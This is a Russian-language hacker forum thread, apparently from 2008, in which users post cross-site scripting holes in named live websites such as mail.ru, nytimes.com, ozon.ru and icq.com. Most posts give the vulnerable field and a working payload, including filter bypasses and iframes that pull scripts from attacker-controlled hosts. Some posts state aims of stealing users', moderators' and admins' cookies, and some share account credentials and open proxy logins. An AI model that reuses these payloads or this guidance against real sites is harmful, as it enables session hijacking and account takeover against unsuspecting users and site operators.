дико извеняюсь за офф топ достал куки каким образом их использовать если еcть инфа на анти чате дайте ссылочку пожалуйста
:)
Вбей в браузер вроде в Опере есть в настройках куда куки ставлять
www.shinovozoff.ru - онлайн магазин авто-товаров
http://www.shinovozoff.ru/guestbook/
уязвимы все поля ввода, результат =)
www.jino-net.ru
у себя в контрольной панели в поле подсказка пароля пишешь:
<script>alert(document.cookie)</script>
Затем идёшь восстанавливать пароль:
www.jino-net.ru/lostpass.phtml?login=ЛОГИН
и выскакивает алерт с куками
MaSter GeN
03.02.2008, 21:43
gamer.kraslan.ru
в поле комментов втыкаем
<iframe src= http://you-money.100webspace.net <
рабочая версия
http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791
auto05.ru
http://www.auto05.ru/guestbook.html?page=1
Уязвимо поле комментариев.
redyarsk.ru
http://www.redyarsk.ru/gb/index.php?t=1&all=
Уязвимо поле комментариев.
MaSter GeN
18.02.2008, 20:59
уууу блин
http://www.pressofatlanticcity.com
постим коммент к новости
<IMG """><SCRIPT>alert("master gen")</SCRIPT>">
получам
рабочий вариант !
http://www.pressofatlanticcity.com/188/story/84175.html
http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303
в заголовке (Subjekti) пишите:
<script>alert(/n1k70/)</script>
Вот
http://www.lugarus.com/users/haruka0000/
Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе".
гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi
Пишем сообщение уязвимое поле: Heimasíða
imajo.ati
04.03.2008, 16:54
icq.com
план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script>
затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке
http://icq.com/people/full_details_update.php
вылетит куча алертов =)
нужно "помочь" юзеру логиниться за ваш номер.
либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше
Извеняюсь за повторение
www.omen.ru
<script>alert(\'Хss\')</script>
уязвимые поля
Ищу рост от:
Ищу рост до:
Ищу вес от:
Ищу вес до:
ЛифчиС5СВ
12.03.2008, 19:03
www.26thavenue.com
Регимся на форуме:
http://www.26thavenue.com/index.php?action=main.forums
В профайле в поля Location, Interests пишем:
<script>alert("Antichat")</script>
Horsekiller
13.03.2008, 13:52
www.26thavenue.com
Поковырял еще немного.
Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем <script>alert(/Xss/)</script>
Потом еще при отправке сообщений - поля
Link URL,
Link Title.
"><script>alert()</script>
Забил в гугл powered by bSpeak попробовал в нескольких местах, везде работает.
Кроме этого есть пассивные XSS в этом движке, пример -
http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E
или в другом месте -
http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E
MaSter GeN
13.03.2008, 18:23
www.nytimes.com
Ну собственно онлайн версия газеты нью йорк таймс :)
Нужно имять статут зарегенного пользователя
когда герегились постим коммент б блоге типа
<irame src=http://you.site.com/xss.html <
ну и собстевенно создаем у себя страничку с названием xss.html
содержашую
<script>alert(/XSS/)<script>
lovas.ru
вообще бараги какие то, не люблю барыг
Заводим ак. Грузим фотку к ней добавляем коментарий с нашим кодом
напрмер таким </SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>
Возможно есть и sql inj
с помощью подзапросов к БД, вывел юзера 'lovas'@'localhost :)
bronepoezd.ru
в гостевой в поле сообщение пишем
[.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img]
без точек в бб теге
file.mail.ru
narod.yandex.ru/disk/
заливаем файл со скриптом, который, при открытии файла, выполнится.
domex.ru
Уязвимые поля:
Площадь (м2)
Цена
В уязвимых полях пишем: "><script>alert()</script>
bloggerswap.com
Заводим акк на этом ресурсе
затем редактируем инфо Edit Account Details
в поле Website Name: добавим наш код:
">'><SCRIPT>alert(4)</SCRIPT> ;) жмем edit my account
Выкладывалась как то sql inj ====> equipnet.ru \выкладывал ее не без известный и всеми любимый Дон Карлеоне ;) привет Дон :rolleyes: \
http://www.equipnet.ru/job.php?beg_msg=0&end_msg=25
Добавим новое сообщение
<SCRIPT>alert(/Привет девчонки!/)</SCRIPT>
жертве нужно кликнуть по ссылке моего объявления и куку гриня ;)
+++++++++++++++++++++++++++++++++++
MaSter GeN
24.03.2008, 12:52
ehbsr.com
не люблю я все таки американцев :)
Нужно иметь статус зерегнного пользователя вот:
User:birch64
password:ywrcws
тыкаем мой аккаунт и в поле fist name втыкаем:
<img"""><script>alert(/ЛЯ ПА ПАМ/)</script>
Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration
Уязвимые поля:
Фамилия
Имя
Отчество
NickName
Место Жительства
В уязвимых полях пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Луч-Энергия"
www.luch-energy.ru/?search
Уязвимое поле:
Ваш запрос
В уязвимом поле пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Локомотив"
http://www.fclm.ru/s-info-center/
Пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Амкар"
http://www.amkar.ru/reg/reg.asp
Уязвимые поля:
Логин
Город
Веб-Сайт
В уязвимых полях пишем: "><script>alert()</script>
Регестрируемся
Заходим
Вылетает Алерт
.Striker
30.03.2008, 16:03
хостинг картинок
http://images.i-files.org/
в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт
-------------------------------
"Знаменитый" украинский хотинг файлов upload.com.ua
Заходим в аккаунт и создаем каталог с названием "><script>alert()</script>
Получаем активную xss ;)
PS upload уже профиксили :(
Buffalon
30.03.2008, 23:30
http://ul-rocksite.info
Переходит на страницу чата:
http://ul-rocksite.info/index.php?page=chat
И в чате рисуем следующее:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
OPera Версия 9.23
хостинг картинок
http://images.i-files.org/
в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт
вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)
mail.ru
http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)
кстате и на forum.lady.mail.ru тоже работает)
DimOnOID
09.04.2008, 01:00
:D Ты забыл про forum.auto.mail.ru
а вапще если немного посмотреть на домена мейла..то можно найти ещё парочку форумов :D
DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.
-=megahertz=-
14.04.2008, 21:09
Интернет-магазин бытовой техники и электроники
http://www.003.ru/
При регистрации уязвимы поля Фамилия, Имя и Отчество
"<script><alert('xss by megahertz')</script>
echobyte
19.04.2008, 01:04
инет магазин оружия
http://www.kortik.ru/
уязвимы комментарии
пример
http://www.kortik.ru/catalog.php?a=3&id=2641
[radikal.ru]
[заводим акк, загружаем картинку, а затем редактируем,
в поле Надпись на фото
вводим ядовитый код ]
">'></title><SCRIPT>alert(/хренкоми/)</SCRIPT>
-----------------------------
www.tnd.ru
регимся, затем редактируем свои данные
ну и соответственно внедряем код в следующие поля
http://i007.radikal.ru/0804/e3/5e981d1dd520.jpg
mail.ru
http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)
кстате и на forum.lady.mail.ru тоже работает)
DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.
Еще здесь такой же форум и как следствие тут тоже активная xss в заголовке темы на форуме.
http://forum.deti.mail.ru/
[NoNaMe] nnm.ru
Идем в http://doci.nnm.ru/newdoc и создаем новый док.
Уязвимо поле "Название дока".
[NoNaMe] nnm.ru
Идем в http://doci.nnm.ru/newdoc и создаем новый док.
Уязвимо поле "Название дока".
во первых ограничение на 30 символов, во-вторых название локи <h1>doc</h1> отобразилось как есть :(
http://www.origitea.ru/default.aspx?404;http://www.origitea.ru:80/guest
Визде пишем <script>alert()</script>
http://memori.ru
регаемся
в поле имя или фамилия пишем
<script>alert()</script>
смотрим профиль
www.33hochu.ru
Нашел вначале пассивную
Зарегался думаю может еще что есть интересненькое?
ГЫ, конечно есть, проходим несложную регистрацию, и в своем профайле создаем фотоальбом а в названии пишем наш код
например --></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>
можно так "><script>alert(document.cookie)</script>
еще можно раскрыть пути и пощупать на предмет (мусколь стопудова стоит) инжекции ;)
http://www.33hochu.ru/antixy
вот что получилось ))
все, работает и в опере и в лисе :)
echobyte
05.05.2008, 19:02
www.pcweek.ru
уязвимы комментарии
пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment
хытитипи ввв.stroyazbuka.com/web/registration.php
так вот. регестрируемся в каталоге. в поле регион можно внедрить свой код ))
так же есть и пассивная. (говорю тока о xss ))) есть и другие темы ;) )
YoYo Factory
11.05.2008, 11:08
http://www.themobstergame.com/ /
Уязвима Регистрация
Ни одно поле не фильтруется
"><script>('XSS')</script>
хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))
http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>
ИдиВЖопу.ру
Уязвимы поля "текст под картинкой" и "над картинкой"
Пример:
http://idi-v-zhopu.ru/?166
(с) Лигендо...
Заводи ак создаем вакансию. :p
http://www.jobportal.com.ua/vacancy/499117.html
(портфолио разработчика http://www.globalweb.kiev.ua/portfolio/)
М.Боярский
18.05.2008, 13:58
Kanalia.ru - сайт обо мне!
в каментах галлереи не фильтруеццо имя отправителя
http://kanalia.ru/gallery/
echobyte
23.05.2008, 00:05
Сиськи!
http://hahaha.com.ua/file/54.html
_http://checkproxy.nnm.netserv.name/
admin
123456
_http://queen-love.com/proxy5/
admin
123456
Юзайте и не просите больше никого о халявных прокси.
echobyte
27.05.2008, 22:42
http://www.panvasoft.com/rus/5452/gb/
Chronicle.com - Деньги
/forums/index.php?board=[XSS]
/forums/index.php?topic=[XSS]
http://www.all-biz.info/ru/
при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб
ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS)))
http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0%B1%D0%B0%D0%B C%D1%81%27%29%3C%2Fscript%3E&cs=&ac_category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C
Buffalon
31.05.2008, 16:15
http://o-sport.ru/guestbook/index.php
0Й... .Вводите в гостевой
<script>alert()</script>
и всё
D9D9_VAD9
01.06.2008, 11:12
svadbann.ru
Гостевая книга
http://www.svadbann.ru/q_answer.html
Активны все три поля, сообщение, имя, мыло
echobyte
04.06.2008, 19:58
http://classifieds.invictory.org
уязвимы обьявления
otmorozok428
08.06.2008, 12:55
Сайт Российских Сутенёров
http://www.suter.ru/blacklist.html
POST-форма, поле "Дополнительно:
(краткое описание происшетшего)"
<script>alert("Сайт закрыт за нарушение действующего законодательства Российской Федерации")</script>
karaul.ru/
Xss найдена в добавление комментария.
Вот пример:
_http://karaul.ru/30.12.2004/13/comments
_http://karaul.ru/09.06.2008/11/comments
В поле имя вводите стандартное:
<script>alert('antichat.ru')</script>
И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.
www.skisport.ru
Оффициальный сайт журанала лыжный спорт.
Пример скрипта:
http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for +antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte=
У этого ресурса бажная функция поиска по сайту.
Как обычно пишем:<script>alert('antichat.ru want you!')</script>
И творим добро =)
fidep.ru
http://www.idiot.fidep.ru все просто.
MaSTeR GэN
10.06.2008, 23:11
=\ за разделом никто не следит так как они на фик никому не нужны :D к статит это пассивные.
Еманыйрот!
А зря может кто нить научился бы xss различать ;)
vkadre.ru
собственно тыкая создать добавить ролик вбиваем имя
</title><script>alert(/xss/)</script>+
cобственно канает любой тег главное title закрыть ;)
вотс уже рабочий линк
http://vkadre.ru/users/1926899
Кто хорошо подумает может на самом контакте активку найти ;)
И снова я
http://www.internetpro.ru/boards/index.php
добавим пару объяв о продаже мопедов? )))))))))
http://majordomo.ru/constructor/
Заходим на тестовый акк, удаляется через 20 минут )))
http://iloveru.net/ трут быстро =)
MaSTeR GэN
11.06.2008, 22:48
вообшем то сайт ру подкастинга ;)
rpod.ru
собсвенно уязвимо поле коменнентов т,е заходим выбириаем группу тему и оставляем коммент
<iframe src="http://blabla.ru/index.html" <
ну и собственно создаем на домене blabla.ru index.html
c нужным кодом )
рабочий пример с фреймом на гугль.ru )
http://siski-piski-show.rpod.ru/82.html#c110876
price.ua
завдоми ак,
поле фио.
усё. =)
Тока что нашел одну ХСС у себя на форуме на mybb.ru, наверно баян, но все же.
В профиле есть вкладка "остальное", в админке можно разрешить пользователям заполнять ее.
Пишем <script>alert()</script> и вуаля. А дальше ищите дурака админа, который разрешил эти поля.
Проблема в длинне. Максимум на серве 999 символов, а там, кто как поставит.
ловите позитффф
http://blog.meta.ua блоги ;)
как вариант, создаем свое сообщество
http://contact.meta.ua
вообщем есть над чем поразмыслить =\
Нашел уязвимость на www.playground.ru
Жмем регистрация и вставляем <script>alert()</script>
Уязвимые поля:
Конфигурация компьютера
Ваш сайт
О себе
Вот моя рега http://users.playground.ru/448520/
Ded MustD!e
15.06.2008, 07:46
Журнал Total Football
http://www.totalfootball.ru
Добавляем комментарий к новости, уязвимы все поля :p
Также присутствует пассивка в поиске, и если поискать sql-inj ;)
Случайно нашел доску объявлений.
Уязвимы все комменты к товарам.
http://stolbik.kiev.ua/b5111492.html
А в поиске сидит пассивка:
_http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XS S+from+Light%27%29%3C%2Fscript%3E&group=0&search_butt.x=28&search_butt.y=9
Вот еще: http://www.inox.ua/?check=guest_book<=1213543321953
Уязвимые поля: Имя, www, сообщение.
Частенько админ заглядывает в гостевую и коментит, можно его поймать)))
В поиске тоже сидит пассивка.
__________
Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...
Вот какого зверя я нашел на этот раз: http://www.ilovedress.ru/catalogue/shops/?pid=168
уязвимым оказалось имя пользователя
ЗЫ Админка тоже на глаза попалась http://www.ilovedress.ru/admin/login.php
Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0
____________
Админ прикрыл гостевую, наверно фильтр поставит(((
MaSTeR GэN
16.06.2008, 08:15
Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0
хочешь удивиться ? ))) выскакивает alert(document.cookie)
;) просто в куках кроме id cессии не чего нет )
хочешь удивиться ? ))) выскакивает alert(document.cookie)
;) просто в куках кроме id cессии не чего нет )
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.
А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail.php?ID=6308?add-comment
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.
А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail.php?ID=6308?add-comment
хотелось секаса с девчиной, а получился xss "активный"(с) :D
Вот моя вечерняя XSS, есть над чем поугарать, специально для самых внимательных.
http://www.tabacum.ru/showinfo.php?id=63
Поля: имя и коммент
planeta.rambler.ru
Для теста создал два ака.
Создал в одном сообщество. (вот тут первая хцц)
в названии..
(что то типа бла бла бла //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>)
мои настройки: премодерация- включена
участвуют все желающие
писатели- участники
читатели -участники сообщества
эксперты- назначает автор тобишь я
===========
Далее. назначаем эксперта нашего сообщества (пока себя самого) - + добавляем экспертные области опять же внедряем свой код
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ( в приципе можно воспользоваться :) )
=================
теперь вторым аком заходим в наше сообщество и подаем заявку на вступление
=================
ну и попробуем добавить запись в наше сообщество
олерте :D
(ЗЫ акк чела должен быть в ваших друзьях)
=================
поиграйтесь с настройками, может я что то упустил ;)
ъхэк!
MaSTeR GэN
17.06.2008, 17:32
businessweek.com
полезно иногда новости читать ;)
постим коммент к новости
<iframe src=http://ha.ckers.org/scriptlet.html <
содержание scriptlet.html думаю сами понимаете ))
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
воврашаемся обратно по линку с новостью )) вуаля )
для примера вот news ;)
http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+i ndex+page_top+stories
P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )
fotki.yandex.ru
уязвимо поле "Альбом". ничего не фильтруется.
http://www.oke.ru/xo4u.php?id=-42717
Поля имя и мыло
комментарии на wiki.xakep.ru собственно пример:
http://wiki.xakep.ru/(S(binh5p451x3ngf45fdpipz55))/fononnyi_kompyuter.ashx?Discuss=1&NoRedirect=1
продолжим с гуглом...
greetz to xcedz, закобяка ты ендакая..
Заходим в группы и заливаем в файлы html-файл.
Вот пример:
http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWP VPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY
Ъхек :)
продолжим с гуглом...
greetz to xcedz, закобяка ты ендакая..
Заходим в группы и заливаем в файлы html-файл.
Вот пример:
http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWP VPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY
Ъхек :)
прости друк, я не хотел :(
коментарии вот собственно пример
http://www.new-most.info/press-centre/announcements/4508.htm#comment
Блин- в алерте написал Россия-чемпион (сайт был украинский) теперь прежде чем вывесить комент комент пишет что типа ваш комент будет добавлен после проверки модератором)))- а мож это и неплохо совсем- так окажется гарантия если прийдут куки то что куки модера или админа)))
ozon.ru
В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик.
Пример: http://www.ozon.ru/context/detail/id/3819533/
<td colspan="3" align="right" class="vertpadd"
style="padding-right:20px; color:Gray;">Мамедов
(<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>),
Москва<fuck>, 21 год
</td>
BlackSun
30.06.2008, 20:03
Пров Дом.сру, биллинг
http://tmn.citydom.ru/bill/
Активная ксс у операторов в статистике (в забаненных логинах, при большом кол-ве неправильных попыток), уязвимо поле Логин
moskva.ru - ставим имя <script>alert('xss')</script> заходим в поиск по интересам и вуаля алерт сработал :) чувствую там ещё много багов будет :)
Ку! дяди хакеры, снов я - флудер очата:
http://my.mail.ru/mail/sq2inj/
вы должны зайти в свой мир и перейти на мою страничку .
Поскольку сами не дураки то надеюсь догадаетесь как реализовать. ну и еще есть возможность загрузки swf (догадываетесь о чем я?)
чмоке зайки =)
Зы, l1ght- не зачет. не похекерске, а еще ты поддакивалка.
ну и еще есть возможность загрузки swf (догадываетесь о чем я?)
Пример
Мейл ру
логинимся и дуем поссылочке
http://music.my.mail.ru/05091c0018001b0512090302061801021405030455515c5355 0750040d0e01035b5554025c000a50595f0755075d000d06.s wf
BlackSun
11.07.2008, 03:46
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html
---------
Жаль, что ток у мну пашет ( -deleted-
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html
---------
Жаль, что ток у мну пашет ( -deleted-
пашет!
пример http://r27.vip-file.com:81/download9/12-6c6fdb33afc47e1c2f817a460aa79c40/as.html
20minut.ua PR 4
http://20minut.ua/?lang_code=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )
-=Static=-
17.07.2008, 04:12
_http://www.e-xoopport.it/modules/news/
Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)
BlackSun
19.07.2008, 19:10
NextMail.ru
Активная ксс, старенькая, но ужось, все еще пашет :D
Шлем письмо ..
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value='javascript:alert();'></object>
http://novy.tv/services/chat/
Чат "Нового Канала"
Если кто узнает движок, сообщите плз, такой же у прова стоит...
Регаемся, заходим (visto:visto)
Слева, там где Интонация, выбираем "настройка", добавляем свой вариант - "><script>alert(/Dimi4/)</script>
В меню --- записная книжка --- добавляем запись:
%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2 f%44%69%6d%69%34%2f%29%3c%2f%73%63%72%69%70%74%3e
Ну вообщем может кому пригодится..
и еще фича: если написать в чате сообщение !b blabla !
то текст blabla беоеться в теги <b> blabla </b>
BlackSun
04.08.2008, 01:14
iol.pt
Активная XSS в почте,
Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
Шлем письмо,
Para: - кому,
Assunto: - ксс - <script>alert()</script><noscript>
// BlackSun
krasnodar2000.ru
Активная XSS в комментах новостей
Уязвимые поля "Ваше имя", "Город"
nevasport.ru
Активная XSS в комментах новостей
Уязвимое поле "Ваше имя"
seonews.ru
Активная XSS в комментах новостей
Уязвимое поле "Имя"
Bonnie and Clyde
07.08.2008, 08:13
Активная XSS в бесплатной почтовой системе NextMail.ru
@nextmail.ru
@nxt.ru
@epage.ru
@email.su
@student.su
@hu2.ru
@xaker.ru
@mail2k.ru
@dezigner.ru
@programist.ru
@onlymail.ru
@logmail.ru
Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код.
(прим.: <script>alert(document.coocke);</script>)
XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)
BlackSun
07.08.2008, 08:31
Bonnie and Clyde, работает и в ие, и в опере, и в фф:
https://forum.antichat.ru/showpost.php?p=779537&postcount=229
mailbrush
08.08.2008, 12:28
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
Calcutta
10.08.2008, 14:30
Блог:
http://blogspot.com/
пример первой попавшейся xss. при создании своего блога вписываем алер и:
http://1111vvv.blogspot.com/
от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект
Calcutta
13.08.2008, 13:49
http://mymail-in.net/
срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0"
// Наверное это можно считать за активную xss?
echobyte
13.08.2008, 20:58
http://nexile.ru/href/5713.html
В обьявлениях фильтруется script
соответственно "><scr<script>ipt>alert()</scr</script>ipt>
Calcutta
14.08.2008, 09:59
Сервер: mail.km.ru
зарегал мыло на http://bossmail.ru/
создаем письмо, вписываем в него алерты с таким телом письма:
<body>
<img src="a"onError=alert(121)>
<img src='a'onError=alert(122)>
<img src=javascript
:alert(79)>
<img src=javascript
:alert(68)>
<img src=javascript :alert(57)>
<img src=javascript:alert(46)>
<img src=javascript:alert(16)>
</body>
открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )
echobyte
14.08.2008, 18:54
http://fotocelebrity.net/anna-seminovich/anna-seminovich27.php
NApoleonchik
15.08.2008, 16:39
PR 2
тИЦ 10
http://www.auto-magnitola.ru/forum/index.php
Уязвимы все поля в форуме. Ничего не фильтруется
))
Вот нашол свою первую XSS
Онлайн игра azona.ru
Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS
ЗЫ вроде туда запостил если нет переместите в нужный раздел
Вот нашол свою первую XSS
Онлайн игра azona.ru
Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS
ЗЫ вроде туда запостил если нет переместите в нужный раздел
Это пассивка вроде
А поля там все уязвимы..
echobyte
27.08.2008, 15:21
http://hnu.univerlife.com/prepods/comps/14672/
winstrool
28.08.2008, 08:27
Екатеринбурский крупнейший портал города:
www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS
echobyte
31.08.2008, 21:52
http://www.rozetka.com.ua/ru/products/comments/9217/index.html
пассивные
http://noxak.ru/snak3_find.html , но на SMSline.Biz .
там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона.
Довольно-таки крупный поисковик.
http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2 Fscript%3E
14 алертов
BlackSun
11.09.2008, 22:25
Активная xss (http://images.qwnet.ru/pictures/blacksun/thumbnails/xss_medium.jpg) в почтовике http://www.email.ro
Шлем в теле письма: <img src=1.gif onerror=xss>
wow.citynov.ru
http://wow.citynov.ru/index.php?n=account&sub=pms
В личных сообщениях не фильтруется поле "Тема".
Estemail.com.ua - полуплатная говнопочта.
Тупо не фильтруется поле "Тема" в письме.
DJ ][akep
22.09.2008, 21:31
Универсальный оператор связи.
http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot